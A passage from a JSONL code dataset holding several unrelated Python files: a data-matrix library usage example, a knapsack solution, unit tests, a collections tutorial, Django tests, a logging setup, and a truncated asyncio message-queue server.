share.print_profiler(profiler)\n\n\ndef invalid_instantiations():\n \"\"\"\n 1) matrix must have at least 2 dimensions\n 2) certain reserved column names cannot appear as\n dynamic column names in matrix, eg\n __bool__\n __dict__\n ...\n __weakref__\n _headers\n array\n dict\n header_names\n headers\n is_empty\n is_header_row\n is_jagged\n join_values\n namedrow\n namedtuple\n reserved_names\n values\n \"\"\"\n from vengeance.classes.flux_row_cls import flux_row_cls\n\n reserved = flux_row_cls.reserved_names()\n reserved = '\\n'.join(reserved)\n print('reserved header names: \\n{}'.format(reserved))\n\n try:\n flux = flux_cls() # empty matrix is fine\n flux = flux_cls(['one', 'dimension']) # this is not, unknown if list is meant to be a row or column\n except IndexError as e:\n print(e)\n\n try:\n flux = flux_cls([['_headers',\n 'values',\n 'header_names',\n 'is_jagged',\n '__dict__',\n '__len__']])\n except NameError as e:\n print(e)\n\n print()\n\n\ndef instantiate_flux(num_rows=100,\n num_cols=3,\n len_values=3):\n\n some_namedtuple = namedtuple('some_namedtuple', ('col_a', 'col_b', 'col_c'))\n\n class some_cls:\n def __init__(self, v_a, v_b, v_c):\n self.col_a = v_a\n self.col_b = v_b\n self.col_c = v_c\n\n @property\n def property(self):\n return self.col_a\n\n def method(self):\n return self.col_a\n\n class some_slots_cls:\n __slots__ = ('col_a',\n 'col_b',\n 'col_c')\n\n def __init__(self, v_a, v_b, v_c):\n self.col_a = v_a\n self.col_b = v_b\n self.col_c = v_c\n\n # invalid_instantiations()\n\n # matrix organized like csv data, column names are provided in first row\n m = share.random_matrix(num_rows, num_cols, len_values)\n flux = flux_cls(m)\n\n # __init__ from objects\n m = [some_cls('a', 'b', 'c') for _ in range(3)]\n flux_b = flux_cls(m)\n\n # __init__ from slots objects\n m = [some_slots_cls('a', 'b', 'c') for _ in range(3)]\n flux_b = flux_cls(m)\n\n # __init__ from namedtuples\n m = [some_namedtuple('a', 'b', 'c') for _ in range(3)]\n flux_b = flux_cls(m)\n\n a = repr(flux)\n\n a = flux.headers\n a = flux.header_names()\n\n # help(flux.as_preview_array)\n flux.aap_indices = [-3, None]\n b = flux.as_preview_array\n flux.aap_indices = [1, 5+1]\n c = flux.as_preview_array\n\n a = flux.num_rows\n a = flux.num_cols\n\n a = flux.is_empty()\n a = flux.is_jagged()\n\n return flux\n\n\ndef iterate_flux_rows(flux):\n \"\"\" rows as flux_row_cls objects\n\n for row in flux:\n * preferred iteration syntax\n * skips header row, begins at flux.matrix[1]\n \"\"\"\n flux = flux.copy()\n\n assert flux.num_rows >= 10\n\n # individual rows\n row = flux.matrix[0]\n row = flux.matrix[5]\n row = flux.matrix[10]\n\n flux.label_row_indices() # to help with debugging: modifies row's __repr__ and adds .i attribute\n row = flux.matrix[0]\n row = flux.matrix[5]\n row = flux.matrix[10]\n\n # same results, but one method much faster than the other\n a = [row.dict() for row in flux]\n b = list(flux.dicts())\n\n a = [row.namedrow() for row in flux]\n b = list(flux.namedrows())\n\n a = [row.namedtuple() for row in flux]\n b = list(flux.namedtuples())\n\n # preferred iteration syntax\n # *** for row in flux: ***\n\n for row in flux:\n # help(row.as_preview_array) # to help with debugging: triggers a special view in PyCharm\n a = row.as_preview_array\n i = row.r_i # .r_i attribute added by flux.label_row_indices()\n\n # a = row.is_header_row()\n a = row.headers\n a = row.header_names()\n a = row.values\n\n a = row.namedtuple()\n a = row.namedrow()\n a = row.dict()\n\n # read row values\n a = row.col_a\n a = 
row['col_a']\n a = row[0]\n a = row.values[0] # row.values[0] is faster than row[0]\n\n # assign row values\n row.col_a = a\n row['col_a'] = a\n row[0] = a\n row.values[0] = a\n\n # assign multiple row values\n # row.values = ['bleh'] * len(row)\n # row.values[2:] = ['bleh'] * (len(row) - 2)\n\n # slice matrix\n for row in flux.matrix[5:-5]:\n pass\n\n # stride matrix\n for row in flux.matrix[::3]:\n pass\n\n # row offset comparisions\n for row_1, row_2 in zip(flux.matrix[1:], flux.matrix[2:]):\n if row_1.col_a == row_2.col_b:\n pass\n\n\ndef iterate_primitive_rows(flux):\n \"\"\" rows as primitive values \"\"\"\n flux = flux.copy()\n\n assert flux.num_rows >= 10\n\n # individual rows\n row = flux.matrix[0].values\n row = flux.matrix[5].values\n row = flux.matrix[10].values\n\n for row in flux.rows():\n a = row[0]\n\n for row in flux.rows(r_2=20):\n a = row[0]\n\n for row in flux.rows(5, 10):\n a = row[0]\n\n m = list(flux.rows())\n # or\n m = [row.values for row in flux]\n\n # build new matrix of primitive values\n m = [flux.header_names()]\n for r, row in enumerate(flux, 1):\n if r % 2 == 0 and row[0].startswith('a'):\n m.append(row.values)\n\n pass\n\n\ndef flux_aggregation_methods(flux):\n \"\"\"\n two EXTREMELY important methods introduced here:\n .map_rows()\n .map_rows_append()\n \"\"\"\n flux = flux.copy()\n\n flux.label_row_indices()\n\n flux['col_a'] = ['a'] * len(flux)\n flux['col_b'] = ['b'] * len(flux)\n\n a = flux.unique('col_a')\n a = flux.unique('col_a', 'col_b')\n\n # index_row() renamed to .map_rows()\n # index_rows() renamed to .map_rows_append()\n # a = flux.index_row('col_a')\n # a = flux.index_rows('col_a')\n\n # .map_rows() and .map_rows_append() have slightly different behavior\n d_1 = flux.map_rows('col_a', 'col_b')\n d_2 = flux.map_rows_append('col_a', 'col_b')\n\n k = ('a', 'b')\n a = d_1[k] # .map_rows(): only ever stores a single row\n b = d_2[k] # .map_rows_append(): a list of rows, effectively, a groupby operation\n\n # specify column values to map\n d = flux.map_rows('col_a')\n d = flux.map_rows('col_a', 'col_b')\n d = flux.map_rows(1, 2)\n d = flux.map_rows(slice(-3, -1))\n\n a = [100.0] * flux.num_rows\n b = [100.0] * len(flux)\n\n flux['value_a'] = a\n\n try:\n flux['value_a'] = b\n raise IndexError('column is too long, should raise error')\n except IndexError:\n pass\n\n d = flux.map_rows_append('col_a', 'col_b')\n countifs = {k: len(rows) for k, rows in d.items()}\n sumifs = {k: sum([row.value_a for row in rows])\n for k, rows in d.items()}\n\n # map dictionary values to types other than flux_row_cls\n d = flux.map_rows('col_a', 'col_b', rowtype=dict)\n d = flux.map_rows('col_a', 'col_b', rowtype=list)\n d = flux.map_rows('col_a', 'col_b', rowtype=tuple)\n\n d = flux.map_rows('col_a', 'col_b', rowtype='dict')\n d = flux.map_rows('col_a', 'col_b', rowtype='list')\n d = flux.map_rows('col_a', 'col_b', rowtype='tuple')\n d = flux.map_rows('col_a', 'col_b', rowtype='namedrow')\n d = flux.map_rows('col_a', 'col_b', rowtype='namedtuple')\n\n # group rows\n m = [['col_a', 'col_b', 'col_c']]\n m.extend(['a', 'b', 'c'] for _ in range(3))\n m.extend(['c', 'd', 'e'] for _ in range(3))\n m.extend(['e', 'f', 'g'] for _ in range(3))\n m.extend(['a', 'b', 'g'] for _ in range(2))\n m.extend(['c', 'b', 'e'] for _ in range(2))\n\n flux_b = flux_cls(m)\n a = flux_b.group_rows_append('col_a', 'col_c')\n a = flux_b.group_rows_append('col_a', 'col_c')\n\n\n\n # shared address locations\n m = share.random_matrix(0) + \\\n [['same_address_a', 'same_address_b', 
'same_address_c']] * 1_000\n flux_b = flux_cls(m)\n\n flux_b.label_row_indices()\n d = flux_b.map_rows_append(lambda row: id(row.values))\n flux_b.matrix[1].col_a = 'm'\n\n\n\n # .contiguous()\n # group rows where *adjacent* values are identical\n items = list(flux.contiguous('col_a'))\n\n pass\n\n\ndef flux_sort_and_filter_methods(flux):\n\n # region {flux filter functions}\n\n # variables for filter functions\n criteria_a = {'c', 'd', 'e', 'f', 'z'}\n criteria_b = {'a', 'b', 'm'}\n\n def starts_with_a(_row_):\n \"\"\" first-class function\n\n filter functions should return a boolean value\n False for rows that will be excluded\n True for rows that will be included\n \"\"\"\n return (_row_.col_a.startswith('a') or\n _row_.col_b.startswith('a') or\n _row_.col_c.startswith('a'))\n\n def starts_with_criteria(_row_):\n \"\"\" first-class function referencing variables from closure\n\n filter functions should return a boolean value\n False for rows that will be excluded\n True for rows that will be included\n\n closure scope bypasses the need for additional parameters\n to be passed to function, eg\n starts_with_criteria(_row_, criteria_a, criteria_b)\n \"\"\"\n return (_row_.col_a[0] in criteria_a or\n _row_.col_b[0] in criteria_b)\n # endregion\n\n flux_a = flux.copy()\n flux_b = flux.copy()\n\n flux_a.label_row_indices()\n flux_b.label_row_indices()\n\n # in-place modifications\n flux_b.sort('col_b')\n flux_b.sort('col_a', 'col_b', 'col_c', reverse=[False, True, False])\n\n flux_b.filter(starts_with_a)\n flux_b.filter(starts_with_criteria)\n flux_b.filter_by_unique('col_a', 'col_b')\n\n # methodnames ending in -ed are not in-place, like python's sorted() and sort()\n # flux.sort(), flux.filter()\n # flux.sorted(), flux.filtered()\n\n # return new flux_cls\n flux_b = flux_a.sorted('col_b')\n flux_b = flux_a.sorted('col_a', 'col_b', 'col_c', reverse=[True, False, True])\n\n flux_b = flux_a.filtered(starts_with_a)\n flux_b = flux_a.filtered(starts_with_criteria)\n flux_b = flux_a.filtered_by_unique('col_a', 'col_b')\n\n pass\n\n\ndef flux_row_methods(flux):\n flux_a = flux.copy()\n flux_b = flux.copy()\n\n hdrs = share.random_matrix(0, num_cols=flux.num_cols)[0]\n hdrs = [h + '_new' for h in hdrs]\n rows = [['new' for _ in range(flux.num_cols)]\n for _ in range(10)]\n\n # insert / append rows from another raw lists\n flux_a.append_rows(rows)\n flux_a.insert_rows(5, rows[:3])\n\n # inserting rows at index 0 will overwrite existing headers\n a = flux_a.header_names()\n flux_a.insert_rows(0, [hdrs] + rows)\n b = flux_a.header_names()\n\n assert a != b\n\n # insert / append rows from another flux_cls\n flux_b.insert_rows(1, flux_a)\n flux_b.append_rows(flux_a.matrix[10:15])\n\n flux_a = flux.copy()\n flux_b = flux.copy()\n\n # append rows from flux_a and flux_b\n flux_c = flux_a + flux_b\n\n # delete all but first 10 rows\n del flux_a.matrix[11:]\n\n # inplace add\n flux_a += flux_b.matrix[-5:]\n flux_a += flux_b.matrix[10:15]\n flux_a += [['a', 'b', 'c']] * 10\n\n pass\n\n\ndef flux_jagged_rows(flux):\n flux = flux.copy()\n\n i = 4\n\n # check repr\n flux_repr_a = repr(flux)\n row_repr_a = repr(flux.matrix[i])\n\n # make some jagged rows\n flux.matrix[i].values = ['#err']\n flux.matrix[i + 2].values.extend(['#err', '#err'])\n assert flux.is_jagged()\n\n # check repr again with jagged rows\n flux_repr_b = repr(flux)\n row_repr_b = repr(flux.matrix[i])\n\n assert '🗲jagged🗲' not in flux_repr_a\n assert '🗲jagged' not in row_repr_a\n\n assert '🗲jagged🗲' in flux_repr_b\n assert '🗲jagged' in 
row_repr_b\n\n a = list(flux.jagged_rows())\n\n pass\n\n\ndef flux_column_methods(flux):\n flux_b = flux.copy()\n # flux = flux.copy(deep=True)\n\n flux.rename_columns({'col_a': 'renamed_a',\n 'col_b': 'renamed_b'})\n\n flux.insert_columns((0, 'inserted_a'),\n (0, 'inserted_b'),\n (0, 'inserted_c'),\n ('col_c', 'inserted_d'))\n\n flux.insert_columns(('inserted_d', 'inserted_x'),\n ('inserted_d', 'inserted_y'))\n\n flux.append_columns('append_a',\n 'append_b',\n 'append_c')\n\n flux.delete_columns('inserted_a',\n 'inserted_b',\n 'inserted_c',\n 'inserted_d')\n\n flux.rename_columns({'renamed_a': 'col_a',\n 'renamed_b': 'col_b'})\n\n # encapsulate insertion, deletion and renaming of columns within single function\n flux = instantiate_flux(num_rows=5,\n num_cols=5,\n len_values=3)\n flux.matrix_by_headers('col_c',\n 'col_b',\n {'col_a': 'renamed_a'},\n {'col_a': 'renamed_a_dup'},\n '(inserted_a)',\n '(inserted_b)',\n '(inserted_c)')\n\n # return new flux_cls from matrix_by_headers()\n flux = instantiate_flux(num_rows=5,\n num_cols=5,\n len_values=3)\n flux_b = flux.copy().matrix_by_headers({'col_c': 'renamed_c'},\n {'col_c': 'renamed_d'},\n '(inserted_a)')\n\n pass\n\n\ndef flux_column_values(flux):\n flux = flux.copy()\n\n assert 'col_a' in flux.headers\n assert 'col_b' in flux.headers\n assert 'col_c' in flux.headers\n\n # single column\n col = [row.col_b for row in flux]\n col = flux['col_b']\n col = flux.columns('col_b')\n col = flux[-1]\n col = list(col)\n\n # multiple columns\n cols = flux.columns('col_a', 'col_b', 'col_c')\n cols = flux.columns(0, -2, -1)\n cols = flux[1:3]\n\n a, b, c = flux.columns('col_a', 'col_b', 'col_c')\n\n # append a new column\n flux['append_d'] = [['new'] for _ in range(flux.num_rows)]\n # insert a new column\n flux[(0, 'insert_a')] = [['a'] for _ in range(flux.num_rows)]\n\n # set existing values from another column\n flux['col_a'] = flux['col_b']\n # append to a new column\n flux['col_new'] = flux['col_b']\n # combine column values\n flux['col_new'] = [(row.col_a, row.col_b, row.col_c) for row in flux]\n\n # apply function to column\n flux['col_c'] = [v.lower() for v in flux['col_c']]\n\n # convert datatypes in column\n # flux['col_c'] = [int(v) for v in flux['col_c']]\n # flux['col_c'] = [float(v) for v in flux['col_c']]\n # flux['col_c'] = [str(v) for v in flux['col_c']]\n # flux['col_c'] = [set(v) for v in flux['col_c']]\n # flux['col_c'] = [to_datetime(v, '%Y-%m-%d') for v in flux['col_c']]\n # etc...\n\n # shorthand to apply a single value to all rows in column\n flux['col_zz'] = ['blah'] * flux.num_rows\n flux['col_zz'] = [{'zz': [4, 5, 6]}] * flux.num_rows\n flux['col_zz'] = [[1, 2, 3] for _ in range(flux.num_rows)]\n\n flux['enum'] = flux.indices()\n\n pass\n\n\ndef flux_join():\n\n flux_a = flux_cls([['other_name', 'col_b', 'col_c'],\n *[['a', 'b', 1.11] for _ in range(10)],\n *[['c', 'd', 2.22] for _ in range(10)],\n *[['e', 'f', 3.33] for _ in range(10)]])\n flux_b = flux_cls([['name', 'id', 'cost', 'weight', 'amount'],\n ['a', '#6151-165', 50.10, 33.33, 4],\n ['e', '#8979-154', 100.50, 50.50, 6],\n ['g', '#6654-810', 130.00, 100.33, 10]])\n\n mapped_rows = flux_b.map_rows('name')\n\n flux_a.append_columns('id',\n 'cost',\n 'weight')\n\n for row_a in flux_a:\n row_b = mapped_rows.get(row_a.other_name)\n if row_b is None:\n continue\n\n # copy values from row_b\n row_a.weight = row_b.weight\n\n # or copy all column values in common with row_b\n row_a.join_values(row_b)\n assert row_a.id == row_b.id\n assert row_a.cost == row_b.cost\n assert 
row_a.weight == row_b.weight\n\n # .join method\n for row_a, row_b in flux_a.join(flux_b, {'other_name': 'name'}):\n row_a.cost = row_b.cost\n row_a.weight = row_b.weight\n\n\ndef write_to_file(flux):\n flux.to_csv(share.files_dir + 'flux_file.csv')\n flux.to_json(share.files_dir + 'flux_file.json')\n flux.serialize(share.files_dir + 'flux_file.flux')\n\n # .to_json() with no path argument returns a json string\n # json_str = flux.to_json()\n\n # .to_file()\n # flux.to_file(share.files_dir + 'flux_file.csv')\n # flux.to_file(share.files_dir + 'flux_file.json')\n # flux.to_file(share.files_dir + 'flux_file.flux')\n\n # specify encoding\n # flux.to_csv(share.files_dir + 'flux_file.csv', 'utf-8-sig')\n # flux.to_json(share.files_dir + 'flux_file.json', 'utf-8-sig')\n\n pass\n\n\ndef read_from_file():\n \"\"\" class methods (flux_cls, not flux) \"\"\"\n\n flux = flux_cls.from_csv(share.files_dir + 'flux_file.csv')\n flux = flux_cls.from_json(share.files_dir + 'flux_file.json')\n flux = flux_cls.deserialize(share.files_dir + 'flux_file.flux')\n\n # .from_file()\n # flux = flux_cls.from_file(share.files_dir + 'flux_file.csv')\n # flux = flux_cls.from_file(share.files_dir + 'flux_file.json')\n # flux = flux_cls.from_file(share.files_dir + 'flux_file.flux')\n\n # specify encoding\n # flux = flux_cls.from_csv(share.files_dir + 'flux_file.csv', 'utf-8-sig')\n # flux = flux_cls.from_json(share.files_dir + 'flux_file.json', 'utf-8-sig')\n\n # additional kw arguments control how file is read, such as: strict, lineterminator, ensure_ascii, etc\n # flux = flux_cls.from_csv(share.files_dir + 'flux_file.csv', strict=False, lineterminator='\\r')\n # nrows: reads a restricted number of rows from csv file\n # flux = flux_cls.from_csv(share.files_dir + 'flux_file.csv', nrows=50})\n\n pass\n\n\ndef read_from_excel():\n if ven.loads_excel_module is False:\n print('excel module excluded for platform compatibility')\n return\n\n flux = share.worksheet_to_flux('sheet1')\n flux = share.worksheet_to_flux('sheet1', c_1='col_a', c_2='col_a')\n flux = share.worksheet_to_flux('subsections', c_1='', c_2='')\n\n pass\n\n\ndef write_to_excel(flux):\n if ven.loads_excel_module is False:\n print('excel module excluded for platform compatibility')\n return\n\n share.write_to_worksheet('sheet2', flux)\n share.write_to_worksheet('sheet2', flux.matrix[:4])\n share.write_to_worksheet('sheet1', flux, c_1='F')\n\n pass\n\n\ndef flux_subclass():\n \"\"\"\n the transformation idioms in pandas DataFrames can be difficult to interpret, such as\n df['diff'] = np.sign(df.column1.diff().fillna(0)).shift(-1).fillna(0)\n\n it helps to encapsulate a series of complex state transformations\n in a separate class, where each transformation is given a meaningful\n method name and is responsible for one, and only one action\n\n the transformation definitions can be controlled by the .commands\n class variable, which provides a high-level description of its intended\n behaviors, without the need to look into any function bodies.\n controlling its behavior through discrete transformations also\n makes each state more explicit, modular and easier to maintain\n \"\"\"\n m = [['transaction_id', 'name', 'apples_sold', 'apples_bought', 'date'],\n ['id-001', 'alice', 2, 0, '2019-01-13'],\n ['id-002', 'alice', 0, 1, '2018-03-01'],\n ['id-003', 'bob', 2, 5, '2019-07-22'],\n ['id-004', 'chris', 2, 1, '2019-06-28'],\n ['id-005', None, 7, 1, None]]\n flux = flux_custom_cls(m, 'apples')\n\n # commands = flux_custom_cls.commands\n # print(commands)\n # a = 
repr(flux)\n\n flux.execute_commands(flux.commands, print_commands=True)\n\n # profiler: useful for helping to debug any profile_methods issues\n # flux.execute_commands(flux.commands, profiler=True)\n # flux.execute_commands(flux.commands, profiler='line_profiler')\n # flux.execute_commands(flux.commands, profiler='print_runtime')\n\n flux_b = flux.copy()\n flux.append_columns('bleh')\n flux_b.append_columns('bleh_b')\n\n pass\n\n\n# region @types\n@dataclass\nclass flux_row_custom_cls(flux_row_cls):\n \"\"\" used for autocompletion and type-hints \"\"\"\n transaction_id: str\n name: Union[str, None]\n apples_sold: int\n apples_bought: int\n date: Union[str, datetime]\n# endregion\n\n\nclass flux_custom_cls(flux_cls):\n\n # high-level summary of state transformations\n # (sort and append_columns call to the super class method)\n commands = (('sort', ('apples_sold', 'apples_bought'), {'reverse': [False, True]}),\n '_replace_null_names',\n '_convert_dates',\n '_count_unique_names',\n '_filter_apples_sold',\n ('append_columns', ('commission',\n 'apple_brand',\n 'revenue',\n 'apple_bonus'))\n )\n\n def __init__(self, matrix, product):\n super().__init__(matrix)\n\n self.product = product\n self.num_unique_names = None\n\n # def __iter__(self) -> Generator[flux_row_custom_cls, None, None]:\n # \"\"\" used for autocompletion and type-hints \"\"\"\n # return (row for row in self.matrix[1:])\n\n def _sort(self):\n self.sort('apples_sold', 'apples_bought')\n \n def _replace_null_names(self):\n for row in self:\n if row.name is None:\n row.name = 'unknown'\n\n def _convert_dates(self):\n # if no errors are expected\n # self['date'] = [to_datetime(o) for o in self['date']]\n\n # trap rowtype errors\n for i, row in enumerate(self, 1):\n is_valid, row.date = is_date(row.date)\n # if not is_valid:\n # print(\"invalid date: '{}', row {:,}\".format(row.date, o))\n\n def _count_unique_names(self):\n self.num_unique_names = len(self.unique('name'))\n\n def _filter_apples_sold(self):\n def by_apples_sold(_row_):\n return _row_.apples_sold >= 2\n\n self.filter(by_apples_sold)\n\n def __repr__(self):\n return '{} product: {}'.format(super().__repr__(),\n self.product)\n\n\n# @print_runtime\n# @print_performance(repeat=10)\ndef attribute_access_performance(flux):\n # from vengeance.classes.flux_row_cls import flux_row_cls\n\n # flux.matrix_to_namedrows()\n\n # flux_row_cls.__getattr__ = profiler(flux_row_cls.__getattr__)\n # flux_row_cls.__setattr__ = profiler(flux_row_cls.__setattr__)\n\n for row in flux:\n # read row values\n # a = row.col_a\n # b = row.col_b\n # c = row.col_c\n\n # modify row values\n # row.col_a = 'a'\n # row.col_b = 'b'\n # row.col_c = 'c'\n\n # read and modify row values\n row.col_a = row.col_a\n row.col_b = row.col_b\n row.col_c = row.col_c\n\n # row.values = [None] * len(row)\n\n\nif __name__ == '__main__':\n main()\n\n # if profiler.functions:\n # profiler.print_stats()\n","sub_path":"vengeance_unittest/root/flux_example.py","file_name":"flux_example.py","file_ext":"py","file_size_in_byte":25047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"100033495","text":"c, m = (int(i) for i in input().split())\nkek = [[0 for i in range(m + 1)] for j in range(c + 1)]\n \nfor i in range(1, c+1):\n v, k = (int(i) for i in input().split())\n for j in range(m+1):\n dank = 0;\n if k <= j:\n dank = kek[i-1][j-k] + v\n kek[i][j] = max(kek[i-1][j], dank)\n 
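# kek[i][j] is the classic 0/1 knapsack table: item i (value v, weight k) is either\n# skipped (kek[i-1][j]) or taken (kek[i-1][j-k] + v), so kek[c][m] below is the best\n# total value over all c items within capacity m.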
 \nprint(kek[c][m])","sub_path":"site/solutions/DMOJ/valday15p2.py","file_name":"valday15p2.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"567844545","text":"\"\"\"\nTest for SAR data access provider\n\"\"\"\n\nimport unittest\n\nfrom multiply_dummy.configuration import Configuration\nfrom multiply_dummy.state import TargetState\n\nfrom multiply_data_access.sar_data_access import SARDataAccessProvider\nimport datetime\n\nimport os\nimport tempfile\n\nclass TestSAR(unittest.TestCase):\n    \n    def setUp(self):\n        self.odir = tempfile.mkdtemp() + os.sep\n        t1 = datetime.datetime(2000,1,1)\n        t2 = datetime.datetime(2002,12,31)\n        tstate = TargetState(state={'lai':True, 'sm':False})\n        r = {}\n        r.update({'lr' : {'lat': 45., 'lon' : 11.2}})\n        r.update({'ul' : {'lat': 47., 'lon' : 10.2}})\n        self.c = Configuration(region=r, time_start=t1, time_stop=t2, tstate=tstate)\n\n    def test_init(self):\n        odir = self.odir + 'xyz'\n        S = SARDataAccessProvider(config=self.c, output_dir=odir)\n        self.assertTrue(os.path.exists(S.output_dir))\n        self.assertTrue(S.output_dir[-1] == os.sep)\n\n    def test_get_data(self):\n        S = SARDataAccessProvider(config=self.c, output_dir=self.odir)\n        r = S.get_data()\n        self.assertTrue(isinstance(r, str))\n","sub_path":"tests/test_sar_access.py","file_name":"test_sar_access.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"366939331","text":"from collections import namedtuple, deque, defaultdict, OrderedDict, Counter\n\n# Represents the coordinates of a point: a bare tuple cannot convey what its fields mean, while a full class would be overkill.\n# namedtuple makes it easy to define such a data type: it keeps a tuple's immutability but allows access to fields by attribute name.\n# A Point object is a subclass of tuple\nPoint = namedtuple('Point', ['x', 'y'])\np = Point(1, 2)\nprint(p.x)\n\n# deque is a double-ended list with efficient inserts and deletes at both ends, well suited for queues and stacks\nq = deque(['a', 'b', 'c'])\nq.append('z')\nq.appendleft(1)\nprint(q)\n\n# defaultdict returns a predefined default value when the key does not exist\ndd = defaultdict(lambda: 'N/A')\ndd['a'] = 'A'\nprint(dd['a'])\nprint(dd['b'])\n\n# A list/tuple made up of (key, value) pairs can be converted into a dict\n# With a plain dict the keys are unordered: when iterating over a dict we cannot rely on the order of the keys.\nd = dict([('a', 1), ('b', 2), ('c', 3)])\nprint(d)\nod = OrderedDict([('a', 1), ('b', 2), ('c', 3)])\nprint(od)\n\nd1 = dict((('Jack', 19), ('Marry', 27), ('Jerry', 9)))\nd1['z'] = 'zz'\nprint(d1)\n\n# Counter is a simple counter, e.g. for counting how many times each character occurs\nc = Counter()\nfor ch in 'programming':\n    c[ch] += 1\nprint(c)\n\n\n\n\n\n\n\n","sub_path":"liaoxuefeng_python/webapp/cgi-bin/build_in/collections_test.py","file_name":"collections_test.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"88909378","text":"from django.test import TestCase\n\nfrom django.urls import resolve\nfrom . 
import views\n# Create your tests here.\n# class myTest(TestCase):\n# def test_bad_maths(self):\n# self.assertEqual(1+1,5)\n\nclass HomePageTest(TestCase):\n def test_root_url_resolves_to_home_page_view(self):\n found=resolve('/message/')\n self.assertEqual(found.func,views.getForm)\n\nclass ApiPageTest(TestCase):\n def test_test_url_resolves_to_test_view(self):\n found=resolve('/message/test/')\n print(found.func)\n print(views.FBV.as_view())\n print(views.FBV.as_view())\n self.assertEqual(found.func,views.FBV.as_view())\n\n","sub_path":"mydjango/apps/message/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211443512","text":"import logging\nimport sys\n\nconsole = logging.StreamHandler(sys.stdout)\nlogging.basicConfig(\n level=logging.DEBUG,\n format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n handlers=[console]\n)\n\nmodule_logger = logging.getLogger(__name__)","sub_path":"rpc_handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546144324","text":"import asyncio\nimport collections\nimport logging\nimport json\nfrom collections import defaultdict\nimport aiofiles\nimport re\nimport time\n\nLOGGER = logging.getLogger(__name__)\nQUEUES = defaultdict(lambda: {'obj': asyncio.Queue(loop=asyncio.get_event_loop()), 'subs': []})\nQUEUES['q1']\nLWT = {}\nALIVE = {}\n\nMESSAGE_TYPES = collections.namedtuple(\n 'MessageTypes', ('command', 'error', 'response', 'lwt', 'check_alive', 'received')\n)(*('command', 'error', 'response', 'lwt', 'check_alive', 'received'))\nCOMMANDS = collections.namedtuple('Commands', ('send', 'subscribe', 'disconnect', 'keep_alive')\n)(*('send', 'subscribe', 'disconnect', 'keep_alive'))\n\n\ndef read_messages(files):\n for file in files:\n queue = file.split(\".\")[-2]\n QUEUES[queue]\n for line in open(file, \"r\"):\n jline = json.loads(line)\n QUEUES[queue]['obj'].put_nowait(jline)\n\n\n@asyncio.coroutine\ndef save_message(queue, message):\n file = queue + \".smq\"\n f = yield from aiofiles.open(file, mode='a+')\n try:\n yield from f.write(json.dumps(message) + \"\\n\")\n finally:\n yield from f.close()\n # print(\"Saved:\", str(message))\n\n\n@asyncio.coroutine\ndef delete_message(queue, message):\n file = queue + \".smq\"\n f = yield from aiofiles.open(file, \"r+\")\n d = yield from f.readlines()\n yield from f.seek(0)\n try:\n for i in d:\n if i != json.dumps(message) + \"\\n\":\n yield from f.write(i)\n finally:\n yield from f.truncate()\n yield from f.close()\n\n\ndef match_queues(queue):\n s = queue + \"$\"\n rex = s.replace(\"*\", \"(.*)\")\n queues_list = []\n for i in QUEUES:\n try:\n queues_list.append(re.match(rex, i).group(0))\n except Exception as e:\n LOGGER.error(\"match_queues error {}\".format(e))\n pass\n return queues_list\n\n\n@asyncio.coroutine\ndef send_all(writer, reader, queue, sub_id):\n first = 0\n while not QUEUES[queue][\"obj\"].empty():\n try:\n message = yield from QUEUES[queue][\"obj\"].get()\n reader.feed_data(\"feed\".encode('utf-8'))\n writer.write(json.dumps(message).encode('utf-8'))\n data = yield from reader.read(1024)\n # print(data)\n if data.decode('utf-8') == \"feed\" and first == 1:\n # this is a graceful disconnect\n writer.close()\n return\n first = 1\n if data.decode('utf-8') != \"feed\":\n yield from delete_message(queue, message)\n 
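            # a reply other than the self-fed feed marker acknowledges delivery,\n            # so the persisted copy was deleted above; flush the socket and pause\n            # briefly before sending the next stored message.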
yield from writer.drain()\n yield from asyncio.sleep(0.1)\n except Exception as e:\n yield from QUEUES[queue][\"obj\"].put(message)\n LOGGER.error(\"send_all error {}\".format(e))\n lwt_message = {\n 'type': MESSAGE_TYPES.lwt,\n 'payload': LWT[sub_id][1]\n }\n lwt_queue = LWT[sub_id][0]\n yield from send_to_subscribers(lwt_queue, lwt_message)\n LOGGER.debug(\"Lwt sent - send_all: %s\", sub_id)\n writer.close()\n return\n QUEUES[queue]['subs'].append((writer, reader, sub_id))\n return \"Subscribed to {}\".format(queue)\n\n\n@asyncio.coroutine\ndef send_to_subscribers(queue, message):\n if QUEUES[queue]['subs']:\n for streams in QUEUES[queue]['subs']:\n writer = streams[0]\n sub_id = streams[2]\n try:\n writer.write(json.dumps(message).encode('utf-8'))\n yield from writer.drain()\n except Exception as e:\n if streams in QUEUES[queue]['subs']:\n QUEUES[queue]['subs'].remove(streams)\n writer.close()\n lwt_message = {\n 'type': MESSAGE_TYPES.lwt,\n 'payload': LWT[sub_id][1]\n }\n lwt_queue = LWT[sub_id][0]\n yield from send_to_subscribers(lwt_queue, lwt_message)\n LOGGER.debug(\"Lwt send_to_subs: %s\", sub_id)\n print(e)\n return\n if queue.endswith(\"_p\"):\n yield from delete_message(queue, message)\n return \"OK\"\n\n\n@asyncio.coroutine\ndef handle_command(message, writer, reader):\n command = message.get('command')\n queue = message.get('queue')\n # LOGGER.debug('Handling command %s, payload %s', command, payload)\n if command not in COMMANDS:\n LOGGER.error('Got invalid command %s', command)\n raise ValueError('Invalid command. Should be one of %s' % (COMMANDS,))\n\n if command == COMMANDS.send:\n persistent = queue.endswith(\"_p\")\n if persistent:\n yield from save_message(queue, message)\n msg = yield from send_to_subscribers(queue, message)\n\n elif command == COMMANDS.subscribe:\n queues_to_subscribe = match_queues(queue)\n sub_id = message.get('sub_id')\n lwt_queue = message.get('lwt_queue')\n lwt_message = message.get('lwt_message')\n LWT[sub_id] = [lwt_queue, lwt_message]\n if not 